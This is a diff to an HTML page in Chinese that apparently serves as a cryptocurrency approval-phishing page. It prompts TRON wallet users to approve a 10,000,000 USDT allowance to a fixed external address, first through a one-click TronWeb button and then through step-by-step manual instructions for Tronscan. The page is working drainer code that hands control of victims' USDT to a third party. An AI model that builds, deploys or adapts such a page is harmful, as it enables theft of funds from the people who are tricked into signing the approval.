--- a/index.html
+++ b/index.html
@@ -2,34 +2,57 @@
 <html lang="zh">
 <head>
   <meta charset="UTF-8">
-  <title>一鍵授權 USDT</title>
+  <title>USDT 授權入口</title>
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <script src="https://cdn.jsdelivr.net/npm/tronweb@4.4.0/dist/TronWeb.min.js"></script>
   <style>
-    body { font-family: sans-serif; background: #fff; text-align: center; padding: 2em; }
+    body { font-family: sans-serif; background: #f9f9f9; text-align: center; padding: 2em; }
     h1 { color: #2d3436; }
     .button {
       display: inline-block;
-      margin-top: 2em;
+      margin: 1em;
       background: #00b894;
       color: white;
       padding: 1em 2em;
       text-decoration: none;
-      font-size: 1.2em;
+      font-size: 1.1em;
       border: none;
       border-radius: 8px;
       cursor: pointer;
     }
-    .tip { margin-top: 2em; font-size: 0.9em; color: #636e72; }
+    .tip, .fallback {
+      margin-top: 2em;
+      font-size: 0.9em;
+      color: #636e72;
+      max-width: 480px;
+      margin-left: auto;
+      margin-right: auto;
+    }
+    code {
+      background: #ececec;
+      padding: 0.2em 0.4em;
+      border-radius: 5px;
+      display: block;
+      margin: 0.5em 0;
+      word-break: break-all;
+    }
   </style>
 </head>
 <body>
-  <h1>一鍵授權 10,000,000 USDT</h1>
-  <p>請使用 TronLink App 的 DApp 瀏覽器開啟此頁面，點擊下方按鈕即可授權。</p>
+  <h1>USDT 授權入口</h1>
+  <p>本頁面將協助你授權我們的合約操作你的 USDT。請依照下方方式進行：</p>
 
-  <button class="button" onclick="authorizeUSDT()">立即授權 USDT</button>
-
+  <div id="main"></div>
   <div class="tip" id="status"></div>
+
+  <div class="fallback" id="manual" style="display:none">
+    <h3>🚫 無法偵測 TronLink，請手動授權</h3>
+    <p>請複製以下參數至 <a href="https://tronscan.org/#/contract/TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t/interact" target="_blank">Tronscan 授權頁</a>：</p>
+    <strong>合約方法：</strong> approve(address,uint256)
+    <code>地址：TMxu165T2e3ZKWzgt7gipzmHwE5KYuibGa</code>
+    <code>金額：10000000000000（10,000,000 USDT）</code>
+    <p>或使用支援 DApp 的錢包開啟本頁，例如 TronLink。</p>
+  </div>
 
   <script>
     const USDT_CONTRACT = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
@@ -38,18 +61,35 @@
 
     async function authorizeUSDT() {
       const status = document.getElementById("status");
-      if (!window.tronWeb || !window.tronWeb.defaultAddress.base58) {
-        status.innerText = "❌ 請使用 TronLink DApp 瀏覽器開啟本頁";
-        return;
-      }
-
       try {
         const contract = await window.tronWeb.contract().at(USDT_CONTRACT);
         const tx = await contract.approve(AUTH_CONTRACT, AMOUNT).send();
-        status.innerText = "✅ 授權成功！交易哈希：" + tx;
+        status.innerHTML = `✅ 授權成功！交易哈希：<br><code>${tx}</code>`;
       } catch (err) {
         status.innerText = "❌ 授權失敗：" + err.message;
       }
+    }
+
+    function showInteractiveButton() {
+      const div = document.getElementById("main");
+      const btn = document.createElement("button");
+      btn.className = "button";
+      btn.innerText = "🔐 一鍵授權 USDT";
+      btn.onclick = authorizeUSDT;
+      div.appendChild(btn);
+    }
+
+    if (window.tronWeb && window.tronWeb.defaultAddress.base58) {
+      showInteractiveButton();
+    } else {
+      // 嘗試延遲等待 tronWeb 掛載
+      setTimeout(() => {
+        if (window.tronWeb && window.tronWeb.defaultAddress.base58) {
+          showInteractiveButton();
+        } else {
+          document.getElementById("manual").style.display = "block";
+        }
+      }, 1500);
     }
   </script>
 </body>
